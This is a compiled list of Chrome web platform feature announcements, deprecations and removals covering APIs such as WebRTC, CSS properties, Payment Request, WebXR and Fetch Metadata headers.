The RTCIceCandidate interface describes an ICE candidate in WebRTC. It is available in Chrome, but it is not spec compliant as it is missing some fields. There are also some deviations from the spec in terms of nullable and read-only attributes and errors thrown by the constructor.
Worker global scope’s URL (self.location, referrer, and base URL) should reflect redirects (i.e. should be the response URL, not the request URL), according to the spec.
The worker global scope’s URL has been the response URL in Firefox and the request URL in Chromium/Safari/Edge.
Chromium is changing it to the response URL to match with the spec.
Spec issue: https://github.com/whatwg/html/issues/3760
The [NoInterfaceObject] annotation is being removed from WebIDL. The DeviceOrientation Event specification has been updated to remove this annotation from the Acceleration and RotationRate interfaces and rename them to DeviceMotionEventAcceleration and DeviceMotionEventRotationRate in order to avoid polluting the global namespace with generic interface names.
Signed Exchange Reporting for distributors extends the Network Error Logging to enable the distributors of signed exchanges to investigate signed exchange loading errors such as certificate verification errors.
TextEncoder’s encodeInto() method allows an encoded string to be written directly “into” a supplied pre-allocated buffer, offering a performant alternative to using encode() to produce a buffer, and copying its contents into an existing buffer.
The WebAssembly Threads feature allows multiple WebAssembly instances in separate Web Workers to share a single WebAssembly.Memory object.
As with SharedArrayBuffers in JavaScript, this allows very fast communication between the Workers. This can be used to offload computation to another thread to keep the main thread and its UI responsive.
When an invalid encoding is specified for XMLHttpRequest (via overrideMimeType() or the response’s mime type), UTF-8 is used e.g. for responseText, which is spec conformant. Previously Latin-1 was used.
To prevent messages from being delivered before the destination is ready, client.postMessage() does not dispatch the message until one of the following has occurred on the destination:
The addition of the ‘type’ member will allow passing in parameters specific to one entry type when calling observe() within PerformanceObserver. Right now, ‘entryTypes’ is used to specify potentially multiple entry types to be observed at the same time.
An observer can only use ‘entryTypes’ or ‘type’.
An observer can only specify additional parameters when using ‘type’.
An observer can still observe multiple entry types by calling observe() with ‘type’ multiple times.
PaymentAddress’s languageCode property is browser’s best guess for the language of the text in the shipping, billing, delivery, or pickup address in Payment Request API.
Adds ability to pause execution of an iframe that is not rendered or scrolled out of view.
Similar to scroll event, Chrome will send overscroll and scrollend DOM events.
Some merchant sites may not know the total or line items at the time of attempting to open the payment sheet with show(). This feature is a way to signal that the browser should show a spinner or equivalent and wait on allowing end user interaction until an update.
Currently the Web Animations API allows developers to create animations using the Element.animate() method, which returns an Animation object that is internally constructed.
The full Animation constructor gives the developer more control over the created Animation, including specifying the timeline (currently useless, but in the future enables other types of timelines) and the exact KeyframeEffect object (see https://www.chromestatus.com/feature/4868532347076608)
AnimationEffect and KeyframeEffect are part of the Web Animations API. They allow a developer interactive control over the following parts of their Animation:
We do not intend to ship the composite and iterationComposite members or the getKeyframes/setKeyframes methods at this time.
For quota accounting purposes, the size of cross-origin AppCache resources will be padded. Cross-origin resources are resources whose origin differs from the manifest’s origin. The size padding will be a random number, uniformly distributed between 0 and about 14MB.
Quota accounting purposes include the size reported by the Quota API and quota enforcement (an origin’s storage API calls are blocked when the origin exceeds its quota).
script-src-attr
, script-src-elem
, style-src-attr
, style-src-elem
directivesThese 4 new directives provide the functionality of the script/style directive but with more granularity, applying to elements or attributes.
This is a hint a website may provide to a user agent to display a video content within the element’s playback area.
The getContext() method now supports a desynchronized option, which provides a low-latency alternative to the now deprecated NaCl/PPAPI solution which used native OpenGL rendering. The new solution uses either 2d or webgl rendering. For example:
let context_type = '2d’; // Or 'webgl' canvas.getContext(context_type, {desynchronized: true});
Returns the device-related capabilities (namely sample size, sample rate, latency, and channel count) of the source associated to a MediaStreamTrack.
There is also a variant InputDeviceInfo.getCapabilities(), available in the results of MediaDevices.enumerateDevices().These devices are used as sources for MediaStreamTrack; in this case, getCapabilities() returns the same values as MediaStreamTrack.getCapabilities() for sampleSize, channelCount, and latency.
This feature enables developers to make their numeric literals more readable by creating a visual separation between groups of digits. Using underscores (_, U+005F) as separators helps improve readability for numeric literals, for ex: 1_000_000_000.
Adds a component to provide information about active transports. Specifically, this interface allows an application access to information about the Datagram Transport Layer Security (DTLS) transport over which RTP and RTCP packets are sent and received by RTCRtpSender and RTCRtpReceiver objects, as well other data such as SCTP packets sent and received by data channels.
Provides information about the state of the ICE transports used by RTCPeerConnection to send and receive media to another endpoint.
Normally an inertial scroll operation (such as a swipe gesture) may skip several possible snap positions in favor of a snap position that is closer to its natural end point (which depends on platform and gesture characteristics such as velocity). scroll-snap-stop enables authors to designate a snap position such that it traps the inertial scrolling operations preventing the scroll from skipping it.
Service workers now appear in Chrome’s Task Manager.
This change adds a dictionary to the returned dictionary of storageManager.estimate() that contains details about usage for each storage backend. The goal is to aid in debugging issues around overuse of specific storage systems.
Allows a web page to use window.open() without leaking referrer information by leaving the referrer header out of page navigations.
The Web Authentication API (WebAuthn) lets web applications authenticate users via external authentication devices called security keys. This feature extends Chrome’s implementation of WebAuthn to support local user authorization of security key operations via a user-defined PIN for keys that implement the FIDO CTAP2 protocol. Web sites using WebAuthn can request or require such authorization via the API’s “user verification” mechanisms (https://www.w3.org/TR/webauthn/#user-verification).
This feature adds support for text actions on web notifications. It allows web developers to let users quickly input text in response to a notification, within the notification itself. This is expected to be particularly useful for chat apps.
Adds a memmove type opcode to WebAssembly and enhances existing data sections to support importable base.This allows better optimization of large memcpy/memmove operations. Data section improvement will make shared libraries work better, especially with threads.
Adds opcodes to WebAssembly to support non-trapping float-to-integer conversion to improve the ergonomics of the bytecode format.
The stale-while-revalidate attribute is used by the Cache-Control header and defines an extra window of time during which a cache (proxy, user agents) can use a stale asset while it revalidates it asynchronously.
This improves subsequent page load latencies as stale assets are non longer in the critical path.
To conform to the specification, ExtendableEvent.waitUntil() and FetchEvent.respondWith() can now be called during the microtask checkpoint at the end of event dispatch. Previously, this would throw an InvalidStateError.
Custom cursors with widths or heights greater than 32 DIP will be removed if
they intersect native UX (i.e. are not fully contained in the visual viewport).
Large cursors are being used abusively on the web, to confuse users (see https://crbug.com/880863). Specifically, large custom cursors can be used to cover important (sometimes security related) browser native UX with an arbitrary image to mislead users into thinking they are clicking outside the content area.
Remove the following -webkit-appearance keywords:
button-bevel
caret
listitem
media-controls-background
media-controls-fullscreen-background
media-current-time-display
media-enter-fullscreen-button
media-exit-fullscreen-button
media-mute-button
media-overlay-play-button
media-play-button
media-time-remaining-display
media-toggle-closed-captions-button
media-volume-slider-container
menulist-textfield
menulist-text
progress-bar-value
They are parsable keywords, but has no painting code.
These are old webkit-specific properties that allowed developers to fragment content over columns inside a scrollable region.
See: https://bl.ocks.org/grorg/99eb053b432070b05d1e29759d81458f
Practically speaking this isn’t used. Most developers use it accidentally, and typically when it is used this property to forces a new formatting context similar to setting “overflow: hidden”.
Add new non-standard audio receiver metric to the WebRTC getStats() API called relativePacketArrivalDelay. The metric estimates the delay of incoming packets relative to the first packet received.
Show alerts in the developer console for “Cookies with SameSite by default” and “Reject insecure SameSite=None cookies” to warn developers of upcoming changes that may require their action.
A feature policy to restrict the use of programmatic focus, when not triggered by a user activation.
The proposed policy provides a way to control access to the focus API without user activation. The immediate use case would be restricting all sandboxed frames. Focus API, in this context refers to focus management API and autofocus.
Dedicated workers and worklets continue to execute even though documents may be frozen due to the page lifecycle.
Add RTP timestamp to RTCRtpReceiver.RTCRtpContributingSource. This is additional metadata to the existing RTP source.
Animation.updatePlaybackRate() lets you seamlessly transition the playback rate of an animation such that there is no visible jump in the animation. Current time is preserved at the instance the new playback rate takes effect.
Implements programmatic copying and pasting of images for the Async Clipboard API. This change also updates navigator.clipboard.read() and navigator.clipboard.write() to comply with the specification. Programmatic copying and pasting of images is Chromium’s top starred bug.
The backdrop-filter CSS property applies one or more filters to the “backdrop” of an element. The “backdrop” basically means all of the painted content that lies behind the element. This allows designers to construct “frosted glass” dialog boxes, video overlays, translucent navigation headers, and more.
To prevent a user activation from opening more than one fullscreen window, entering fullscreen will consume the user activation.
Adds dateStyle and timeStyle options to functions on Intl.DateTimeFormat, specifically formatToParts() and resolveOptions(). These options provide a compact way to request the appropriate, locale-specific date and time of given length styles.
The Escape key is no longer treated as a user activation.
Introduces a new set of HTTP request headers, including Sec-Fetch-Site
, Sec-Fetch-Mode
and Sec-Fetch-User
, that sends additional metadata about a request’s provenance (is it cross-site, is it triggered from <img>
, etc.) to the server to allow it to make security decisions which might mitigate some kinds of attacks based on timing the server’s response (xsleaks and others).
The Image Capture API provides a means to set the focusMode to manual which is not useful if you cannot set the focus distance. This change provides an interface for getting focus range values and setting focus distance value.
Adds the pending attribute to the Web Animations API.
A pending animation is one that is waiting on an asynchronous operation that affects the play state. Adding support for this attribute does not affect the rendering or timing of animations, but simply exposes the signal.
request
attributeThis exposes the underlying IDBRequest of IDBCursor objects. It is a minor addition, exposing previously spec’d behavior.
Adds a commit() function to IDBTransaction objects, which explicitly marks a transaction as not accepting further requests.
Currently, IndexedDB only commits a transaction after all associated requests have had their completion event handlers executed, and no new requests have been queued by the event handlers. Developers can use the explicit commit() function to shave a few event loop cycles off of the latency of their transactions.
Adds formatRange() and formatRangeToParts() methods to Intl.DateTimeFormat to format a range of times between two dates, such as ‘Jan 10 – 20, 2007’, or ‘Jan 10 – Feb 20, 2007’.
Changes BigInt.prototype.toLocaleString() to locale-sensitive number formatting and changes Intl.NumberFormat.prototype.format() and formatToParts() to accept BigInt as input.
Enables the Media Capabilities API in all types of workers to help websites pick the best media to stream from a worker. The information can then be used to create the MediaStream from a worker.
Adds the ‘prefers-color-scheme’ feature, which lets authors adapt web content to user-selected dark theme in the OS or browser. Valid options are ‘light’, ‘dark’, or ‘no-preference’.
Adds the PaymentMethodChangeEvent and the associated event handler PaymentRequest.onpaymentmethodchange. Handler invocation indicates that the user has changed payment methods. The event can be useful when a merchant re-calculates a total value with method details. For example, merchants can calculate tax by reading billing address information in the event.
Enables payment handlers to get the updated total from the merchant in response to a change in payment instrument selected within the payment handler. This fires the PaymentMethodChangeEvent on the merchant website.
Adds Promise.allSettled(), which returns a promise that is fulfilled with an array of promise state snapshots, but only after all the original promises have settled, in other words after it has either fulfilled or rejected.
applicationServerKey
The applicationServerKey option is used by the user agent when establishing a push subscription with a push service. This is the key that the application server will use to authenticate itself when sending push messages to this push subscription. Currently, applicationServerKey only supports BufferSource in Chrome. After this change, it can also accept a base64url encoded value.
Allows changing the association between the track associated with an RTCRtpSender and streams. Stream association causes tracks in the same stream to be synchronized. This is useful, for example, if during a call a user switches from a front-facing camera to a back-facing camera and the application uses RTCRtpSender.replaceTrack(). On the receiving end the new track must be associated with the existing stream and synchronized with its auto track.
Adds the setCodecPreferences() method, which overrides the default codec preferences used by the user agent. This allows applications to disable the negotiation of specific codecs. It also allows an application to cause a remote peer to prefer the codec that appears first in the list for sending.
Adds three new methods to the Blob interface to perform read operations: text(), arrayBuffer(), and stream().
<offscreenCanvas>
We are adding ImageBitmapRendererContext as a valid context for OffscreenCanvas. ImageBitmapRenderingContext allows direct transfer of an ImageBitmap to the canvas surface.
This is particularly important as a way to render an ImageBitmap to a Canvas from a Worker (without transferring the ImageBitmap to the main thread).
This is also currently the spec-defined way to render WebGPU content to the screen.
Security keys are generally stateless save for a global signature counter. While it’s technically possible to implement a stateful security key, physical tokens generally encrypt their state in a credential ID that is stored on the server of the relying party.
Resident keys allow the security key to keep state and thus allow a username-less login experience by just proving a local PIN to the device. Developers can exercise this via the existing Webauthn standard.
According to the specification, the MediaStreamAudioDestinationNode in WebAudio should have no outputs. Chrome’s implementation has a single output which will be removed.
Exposes information about the SCTP transport that is used to carry WebRTC DataChannels such as max-message-size and max channels.
Adds the form.requestSubmit() function, which requests form submission. It includes interactive constraint validation, dispatches a ‘submit’ event, and takes a reference to the submitter button.
Adds the break-spaces value for the white-space property which specifies that any sequence of preserved white space that would otherwise overflow a line and hang (as per the CSS Text Module spec’s Trimming and Positioning rules) must be broken.
The lazyload feature policy allows developers to selectively control the lazyload attribute on <iframe>
and <img>
using the Feature-Policy header or the <iframe>
“allow” attribute. This provides more control over loading delay for embedded contents and images on a per origin basis. Use this policy to force loading to delayed or non-delayed for your entire website and all or parts of any embedded contents. Use of this policy benefits page load times.
Chromium has been showing deprecation warnings since 2015 whenever the API is used in a non-secure browsing context. We now conclude the deprecation by restricting the API to secure browsing contexts. This change brings Chromium’s implementations in line with the privacy and security recommendations in the specification, and is aligned with the overarching effort to deprecate powerful features on insecure origins.
Chromium has been showing deprecation warnings since 2015 whenever the API is used in a non-secure browsing context. We now conclude the deprecation by restricting the API to secure browsing contexts. This change brings Chromium’s implementations in line with the privacy and security recommendations in the specification, and is aligned with the overarching effort to deprecate powerful features on insecure origins.
Run C/C++ code compiled to bitcode on any web page. The code runs inside the Native Client sandbox and has access to the same capabilities as JavaScript via the Pepper APIs.
Exposes the client’s PageLifecycle state on the ServiceWorker Client API.
The ‘formdata’ event enables any objects to provide form data. It helps avoid creating <input type=hidden>
representing application state, or making submittable custom elements.
Currently there is no way to supply alternative text for CSS generated content. This change would allow alternative text to be supplied for elements that get their content from the content property.
Enables deferring the load of below-the-fold iframes and images pages until the user scrolls near them, without requiring actions by web developers. This helps to reduce network data and memory use, and may also increase site speed by prioritizing content that users are viewing. This feature is enabled for Chrome Lite Mode users only.
Stop exposing Web MIDI API to insecure origins from Chrome 77.
To update the hover state when a page scrolls or changes layout, Blink currently dispatches fake mouse moves based on a timer because the mouse does not move. Unfortunately, every mouse move does a hit test which affects both performance and testing. This change applies the hover effect only when a mouse physically moves, improving performance and eliminating issues created by fake mouse events.
The ElementTiming API will allow developers to know when certain important image elements are first displayed on the screen. It will also enable analytics providers to measure the display time of images that take up a large fraction of the viewport when they first show up.
The ElementTiming API will allow developers to know when certain important text elements are first displayed on the screen. It will also enable analytics providers to measure the display time of text that takes up a large fraction of the viewport when they first show up.
The enterkeyhint content attribute is an enumerated attribute that specifies what action label (or icon) to present for the enter key on virtual keyboards. This allows authors to customize the presentation of the enter key in order to make it more helpful for users.
Enables serialization of errors, specifically, DOMException, Error, EvalError, RangeError, ReferenceError, SyntaxError, TypeError, and URIError. An example of where this capability may be used is to pass an Error to a worker using PostMessage().
The document-domain policy governs access to document.domain. It is enabled by default, and, if disabled, attempting to set document.domain will throw an error.
The PerformanceEventTiming interface provides timing information about the latency of the first discrete user interaction, specifically one of key down, mouse down, click, a pointer down followed by a pointer up. (Pointer down may be the start of scrolling, which is not tracked.) This is a subset of the EventTiming API, but will be exposed in advance because it provides key metrics to help measure and optimize responsiveness.
Form-associated custom elements enable web authors to define and create custom elements which participate in form submission.
To prevent unintended clicks/taps, quietly discard input events that target cross-origin iframes that have recently resized or moved a non-trivial distance within the embedding page’s viewport.
The shipped version limits the intervention to cross-origin iframes that are using the V2 feature set of IntersectionObserver (https://github.com/w3c/IntersectionObserver/tree/v2).
This feature improves Intl.NumberFormat by adding support for measurement units, currency and sign display policies, and scientific and compact notation.
Largest Contentful Paint (LCP) is a new page load metric available as a performance API, which describes page speed as the speed of delivering the largest contentful element to the screen.
It is the high-level metric (where Element Timing is its low-level primitive) aiming to provide a meaningful result even for developers who don’t annotate their sites.
Adds the LayoutShift interface to the Performance API, allowing developers to monitor changes to a DOM element’s on-screen position.
Support the ‘loading’ attribute, which can be used to defer the load of below-the-fold iframes and images on the page until the user scrolls near them. This is to reduce data usage, memory usage, and to speed up above-the-fold content. Web developers can opt-in to lazy load by specifying loading=lazy on <iframe>
and <img>
elements.
Referer
header’s length to 4kStrips the Referer header down to an origin when it’s size exceeds 4k.
Limits registerProtocolHandler() to only accept URLs with http or https schemas. Because the intent of the API is to allow and endpoint to handle something like an SMS message, for example, it doesn’t make much sense for handlers to be data URLs, blob URLs, or whatever.
The implementation of an extended API of text metrics started in 2014: https://groups.google.com/a/chromium.org/d/msg/blink-dev/SgofW_bQ3ps/jNYamQHplAMJ
But was never shipped, and had multiple undefined values that were not addressed for years. The spec has now evolved and we intend to ship actualBoundingBoxLeft, actualBoundingBoxRight, actualBoundingBoxAscent and actualBoundingBoxDescent according to the current spec: https://html.spec.whatwg.org/multipage/canvas.html#textmetrics
Adds CSS flow-relative properties for controlling overscroll behavior through logical dimensions. flow-relative properties are those that are interpreted relative to the flow of content. The new properties are overscroll-behavior-inline and overscroll-behavior-block.
Splits the HTTP cache using the top frame site and subframe site (where site = scheme://etld+1) to prevent documents from one site from knowing whether a resource from another site was cached.
The HTTP cache is currently one per profile, with a single namespace for all resources and subresources regardless of origin or renderer process. Splitting the cache on top frame site helps the browser deflect side-channel attacks where one site can detect resources in another site’s cache.
Adds a buffered flag to observer.observe() so that PerformanceObserver can receive entries created before the call is executed.
Adds a method that returns a few predicted pointer move events. This enables apps such as drawing apps for example to draw a predicted line, reducing apparent latency for the user.
Send pointerrawupdate events for move events as soon as they happen as oppose to pointermove events which are being rAF-aligned and hence may add half a frame of latency on average from when they happened until they are delivered to the javascript.
Precisely match locally installed fonts by PostScript name or full font name, when used in a local() value to a src: descriptor in a @font-face declaration. This means, you can precisely and uniquely select local fonts by specifying their PostScript name or full font name.
Previously Blink had implemented this incorrectly and was using the specified font name to perform a family match.
Preserves a request’s original priority when it passes through a service worker. Previously, all requests going through a service worker would get “High” priority. This means render-blocking style sheets would have their priority clamped, while less-important resources would get boosted.
The priority of network requests can be seen in the DevTools network tab. Render-blocking resources such as style sheets have “Highest” priority, while resources like async scripts have “Low” priority.
Adds the incecandidateerror event which provides detailed information about WebRTC ICE candidate gathering failures, including the ones defined by STUN (RFC5389) and TURN (RFC5766).
Adds a method for triggering an ICE restart which causes a WebRTC connection to try to reconnect. This feature is already available in Chrome by passing the {iceRestart:true} argument to createOffer(). restartIce() is a version of this method that works regardless of signalingState.
Displays HTTP authentication dialog boxes even if the request was from a service worker. This shows the native login dialog shown when an HTTP 401 response is received.
Note: this requires the network service to be enabled, which is enabled by default on most platforms.
Adds support for the “stop” action to the MediaSession interface. An action is an event tied specifically to a common media function such as pause or play. The “stop” action handler is called when the site should stop the playback and clear the state if appropriate.
Add sub resource integrity verification to link preloads so that resources with an integrity attribute can be preloaded with causing a double download. This feature honors the integrity attribute on link preloads for the as=script and as=style destinations.
The step timing functions jump-both, jump-none, jump-start and jump-end were introduced to the spec for easing functions in 2018. Two of these (jump-start and jump-end) are aliases for start and end. The remaining two provide increased flexibility for step transitions by enabling step functions in which both or neither endpoint has a discontinuous step. Previously, one and only one of the two endpoints could have a step discontinuity.
PaymentRequest constructor throws a TypeError when invalid “supportedNetworks” or “supportedTypes” are specified for “basic-card” payment.
<number>
css value typeAdds support for <number>
css value type to the CSS property tab-size, which determines the tab size used to render preserved tab characters. ‘tab-size’ accepts an <integer>
or a <number>
as its value type, and represents the measure as a real-number multiple of the space character’s advance width, in addition to its integer multiple.
Support for calling PaymentRequest with card issuer networks (e.g., “visa”, “amex”, “mastercard”) in the supportedMethods field.
The feature allows WebXR applications to retrieve data about planes (flat surfaces) present in the user’s environment. This enables AR applications to create a more immersive experiences through the obtained information.
Stops certain methods from snapping values to physical pixels, specifically scrollTop(), scrollLeft(), scrollX(), scrollY(), scrollTo(), and so on. Currently, calling window.scrollTo(0, 123.678) will snap the scroll offset to the nearest physical pixel. On a device with devicePixelRatio equal to 2 this would be 123.5, which is what is returned after this change.
Expands the JavaScript API surface of WebAssembly to allow reflection on the data types of functions imported and exported from a WebAssembly module.
Changes the default style for ::placeholder from #757575 to rgba(0, 0, 0, 0.54).
The CSS Properties and Values API spec defines a registerProperty() function which can be called from JavaScript to register typed and animatable custom CSS properties. This API expands the existing CSS custom properties to improve usability of other Houdini APIs. Being able to animate these and customize inheritance and initial values makes it more useful for custom layout/paint, and having types associated with these allows the typed object mode to work more effectively with custom properties.
Chrome now disallows synchronous XHR during page dismissal when the page is being navigated away from or closed by the user. This involves the following events (when fired on the path of page dismissal): beforeunload, unload, pagehide, and visibilitychange.
A temporary opt-out is available via Origin Trial “Allow Sync XHR In Page Dismissal”:
https://developers.chrome.com/origintrials/#/trials/active
This implements byte-for-byte update check for service worker scripts imported by importScripts().
In cases where there is something wrong with the payment response’s data (e.g., you find out that the shipping address is a PO box), the retry() method of a PaymentResponse instance allows you to ask a user to retry a payment.
Adds support for percentage values to the opacity properties, specifically, opacity, stop-opacity, fill-opacity, stroke-opacity, and shape-image-threshold.
For example, opacity: 50%; is equivalent to opacity: 0.5;
https://drafts.csswg.org/css-color/#transparency
Removes fine-grained information from the shipping address before exposing it to the merchant website in ShippingAddressChange event.
Adds a media session action handler for “seekto”. An action handler is an event tied specifically to a common media function such as pause or play.
The “seekto” action handler will be called when the site should move the playback time to a specific time.
This also adds a MediaSessionActionDetails dictionary that will be passed when an action handler is called. Use this as a basis for passing additional data for “seekbackward”, “seekforward” and “seekto”.
User Timing Level 3 extends the existing User Timing API to enable two new use cases:
Developers can pass custom timestamps to performance.measure() and performance.mark(), so as to conduct measurement across arbitrary timestamps.
Developers can report arbitrary metadata with performance.mark() and performance.measure(), which provides rich data to analytics via a standardized API.
Web Bluetooth getAvailability()
getAvailability() returns a promise that resolves with true if the user agent is running on a system that has a Bluetooth radio and false otherwise. The powered state of the Bluetooth radio does not influence the availability because applications can prompt users to turn on the radio using requestDevice(). The availabilitychanged event can be used to detect changes in the availability of the Bluetooth radio.
Remove the XSS Auditor from Chrome.
Enables Bluetooth Low Energy Scanning
This API is an extension to the WebXR Device API that provides a way to indicate to the underlying XR system that a 3D pose is meant to be kept up to date. Tracked poses may be arbitrary or attached to real world geometry. In current AR systems, poses evolve over time as the system understands more of the real world that surrounds it. As the system’s understanding evolves, anchors enable the application to update poses of virtual objects so that they maintain their relationship to real world.
Adds the ‘autofocus’ attribute to any focusable HTML or SVG element.
Adds the comparison functions min(), max(), and clamp() to math expressions for numeric CSS values.
Computes the aspect ratio of an image using the HTML width and height attributes so that it can be used for sizing an image using CSS before it loads.
Allow Maskable (“Adaptive”) icons for installed WebAPKs on Android.
Cross-Origin Resource Sharing (CORS) is an established web standard protocol to protect servers from unexpected cross-origin network accesses.
Chrome implemented the CORS protocol in the rendering engine, Blink, running in a renderer process before this change. However, once the OOR-CORS feature is enabled, it inspects network accesses in the network service, running in a separate process.
When Worklet.addModule() fails, a promise rejects with a more specific error object than it did previously.
Worklet.addModule() can fail for various reasons, including, for example, network errors and syntax errors. Before this change, Worklet.addModule() rejected with AbortError regardless of the actual cause. That made it difficult for developers to debug worklets. After this change, Worklet.addModule() rejects with a clearer error such as SyntaxError.
The [NoInterfaceObject] annotation is being removed from WebIDL. The Geolocation API specification has been updated to remove this annotation from all interfaces and perform the following renames to avoid polluting the global namespace with generic interface names,
Coordinates -> GeolocationCoordinates
Position -> GeolocationPosition
PositionError -> GeolocationPositionError
This allows a service worker to get its ServiceWorker object with self.serviceWorker in a service worker script and its current state with self.serviceWorker.state in the script.
Do not evaluate scripts or fire error/load events, if <script>
elements are moved between Documents during fetching.
Script elements can be still moved between Documents, but they won’t be executed.
Provides access to input and output capabilities commonly associated with Virtual Reality (VR).
This API is intended to completely replace the WebVR API (https://www.chromestatus.com/feature/4532810371039232). It has been designed to address the issues found in the prior API based on developer, web platform, hardware manufacturer, and implementer feedback.
The WebXR Gamepad Module defines how the Gamepad API integrates with WebXR to communicate the state of various physical inputs (such as buttons, touch pads, and triggers) of an XRInputSource.
Previously the Gamepad API was used in conjunction with the deprecated WebVR API, and was adopted by WebXR with additional ergonomic improvements to support it’s input needs. It is being shipped as a module rather than part of the WebXR core API to allow it to evolve more flexibly.
The font-optical-sizing property automatically sets the font-size to the opsz - optical sizing axis of variable fonts that support optical sizing. This improves styling and legibility of fonts depending on font size because the font chooses a glyph shape that works optimally at the given font size. For example, the glyph contrast is improved in fonts in heading sizes when compared to the same font at body text size. See the spec link for an illustration of optical sizing.
<string>
Allows a stylesheets to use an arbitrary character for the list style marker. Examples include “-”, “+”, “★” and “▸”. Since CSS Level 2, list-style-type has supported keywords like “disc” or “decimal” to define the appearance of the list item marker.
Remove the aria-help attribute.
Changes -webkit-appearance keywords to work only with specific element types. If a keyword is applied to a non-supported element, the element has the default appearance.
This feature will partition the server entries in the cache using top frame origin (and also possibly the subframe origin) to prevent sites from using this cache to track users across sites.
Allows the calendar and numbering system to be specified in the options object of the DateTimeFormat() and NumberFormat() constructors.
Manifests previously allowed overriding any URL within a given origin. Scope checking is being introduced to ensure only URLs within a manifest’s scope can be overridden. The default manifest scope will be the path to the manifest’s enclosing directory. Sites that desire a manifest be given a broader scope can add a response header “X-AppCache-Allowed: /” to manifest responses to preserve the previous behavior.
This feature will autoupgrade optionally-blockable mixed content (HTTP content in HTTPS sites) by rewriting the URL to HTTPS, without a fallback to HTTP if the content is not available over HTTPS. In the first version (targeted for M80) only audio and video content will be upgraded.
Provides a means of performing gzip and deflate compression from JavaScript using streams. This covers two interfaces: CompressionStream and DecompressionStream.
Provides a way for websites to request information about the user’s contact(s) and provides a UI for the user to share those details in a way that makes it clear what is being shared with the website. This could be used for bootstrapping a friends list on a social network or (in an email/messaging application) to select message recipients.
Adds setTransform(DOMMatrix2DInit) and getTransform() to OffscreenCanvasRenderingContext2D.
Pages may no longer use the window.open() API to open a new page during its unload.
The popup blocker already prohibits this, but now it is prohibited whether or not the popup blocker is enabled.
Enterprises used to be able to use the AllowPopupsDuringPageUnload policy flag to allow popups during unload. We removed this flag in Chrome 88.
JavaScript will support modules in dedicated workers. Using a new value for the constructor’s type attribute, worker scripts are loaded as ES modules and the import statement is available on worker contexts. With this feature, web developers can more easily write programs in a composable way and share them among a page and workers.
The Sec-Fetch-Dest
HTTP request header exposes information about a request’s destination
to servers, which allows them to make better-informed decisions about the implications of serving a given response. https://w3c.github.io/webappsec-fetch-metadata/#intro lays out the motivation.
This simple API tells sites how a video playback is performing. When performance is poor, sites may use the information to reduce the video bitrate / framerate / resolution for a better user experience.
Provides safe access to descendent object members with parents that may or may not be null. This applies to objects as well as functions. For example, consider an object reference with three levels such as a.b.c. Testing for the existence of c would previously require nesting said test inside a test for b. This change allows you to test for c directly without an error being thrown when b is null.
Adds encrypted media support from the Decoding Information API. Chrome 66 introduced this API (https://www.chromestatus.com/feature/5869632707624960) to answer the question can this device decode this media? The API additionally notes whether the decoding will be smooth (performant) and/or power efficient. This new feature allows authors to ask the same question for encrypted media.
Give users the ability to customize their sites with the relevant system colors when in forced colors mode. The keywords being added are ActiveText, Field, and FieldText.
ActiveText is for active links. Field is for input field backgrounds. FieldText is for input field text.
Adds support for the ‘nullish’ operator to JS.
Periodic Background Sync is an extension of Background Sync that allows websites to register tasks to be run in a service worker at periodic intervals with network connectivity.
Makes the RTCSessionDescription argument optional for setLocalDescription(). Previously, it required a value returned by createOffer() or createAnswer(). With this change Chromium generates the the offer or answer implicitly when no argument is provided. This avoids possible edge-case races.
Adds rollback, which is a way to cancel an on-going negotiation. This is needed if two WebRTC endpoints attempt to send an offer at the same time. In this case, one of the endpoints has to cancel its local offer by rolling back so that it can accept the incoming offer. This lets it complete the remote negotiation then create a follow-up offer after it becomes stable. Without it, negotiation cannot complete.
The prefers-color-scheme feature in Media Queries Level 5 supported three values: ‘no-preference’, ‘light’, ‘dark’. Remove the support for the ‘no-preference’ value because it has been removed from the specification.
This feature allows a user or author to link to a specific portion of a page, using a text snippet provided in the URL. When the page is loaded, the browser highlights the text and scrolls it into view.
For example, the URL:
[https://en.wikipedia.org/wiki/Cat#:~:text=On%20islands,%20birds%20can%20contribute%20as%20much%20as%2060%%20of%20a%20cat%27s%20diet]
This loads the page for Cat, highlights the specified text, and scrolls directly to it.
Notifies the receiver when a posted message could not be decoded. This is similar to https://www.chromestatus.com/features/5729005244252160 but applies to ServiceWorkerContainer.
Allows using images in SVG format as favicons with <link rel="icon">
.
Add support for WebAssembly functions and blocks that return more than one value.
Changes the Payment Handler API, to let the browser delegate handling of shipping address and payer’s contact information to Payment Handlers.
The ‘line-break: anywhere’ declaration allows soft wrapping around every typographic character unit, including around any punctuation character or preserved spaces, or in the middles of words. It disregards any prohibition against line breaks, even those introduced by characters with the GL, WJ, or ZWJ character class (see UAX 14) or mandated by the word-break property.
The new value ‘anywhere’ allows an otherwise unbreakable sequence of characters to be broken at an arbitrary point if there are no otherwise-acceptable break points in a line.
Additionally, soft wrap opportunities introduced by ‘anywhere’ are considered when calculating min-content intrinsic sizes.
Added support for virtual reality head mounted displays, such as the Oculus Rift and Google Cardboard.
This API being replaced by the WebXR Device API (https://www.chromestatus.com/feature/5680169905815552), which is expected to ship in Chrome 79. The WebVR Origin Trial ended on July 24, 2018.
Removal is expected in Chrome 80.
Changes -webkit-appearance:button to work only with <button>
and <input>
buttons. If ‘button’ is specified for an unsupported element, the element has the default appearance.
This is a follow-up of https://chromestatus.com/feature/5070237827334144
Custom Elements v0 is deprecated at M70, and will be removed in M80, by February, 2020.
Please see this post for more information:
https://developers.google.com/web/updates/2019/07/web-components-time-to-upgrade
For the original Intent to Deprecate: https://groups.google.com/a/chromium.org/d/msg/blink-dev/h-JwMiPUnuU/sl79aLoLBQAJ
Custom Elements v0 was an experimental technology, never implemented in any other browser. The spec is superseded by Custom Elements v1, which is widely supported.
HTML Imports are deprecated at M70, and will be removed in M80, by February, 2020.
Please see this post for more information:
https://developers.google.com/web/updates/2019/07/web-components-time-to-upgrade
For the original Intent to Deprecate: https://groups.google.com/a/chromium.org/d/msg/blink-dev/h-JwMiPUnuU/sl79aLoLBQAJ
HTML Imports was an experimental technology, never implemented in any other browser. The spec is superseded by ES modules, which is widely supported.
This change raises errors when a script tries to serialize or transfer a non-origin-clean ImageBitmap. A non-origin-clean ImageBitmap is one that contains data from cross cross-origin images that is not verified by CORS logic.
Shadow DOM v0 is deprecated at M70, and removed in M80. All code has been deleted as of M89.
Intent to Deprecate: https://groups.google.com/a/chromium.org/d/msg/blink-dev/h-JwMiPUnuU/sl79aLoLBQAJ
Shadow DOM v0 was an experimental technology, never implemented in any other browser. The spec is superseded by Shadow DOM v1, which is widely supported.
Note that the /deep/ combinator, which was changed to a no-op in M63, has been completely removed in M89.
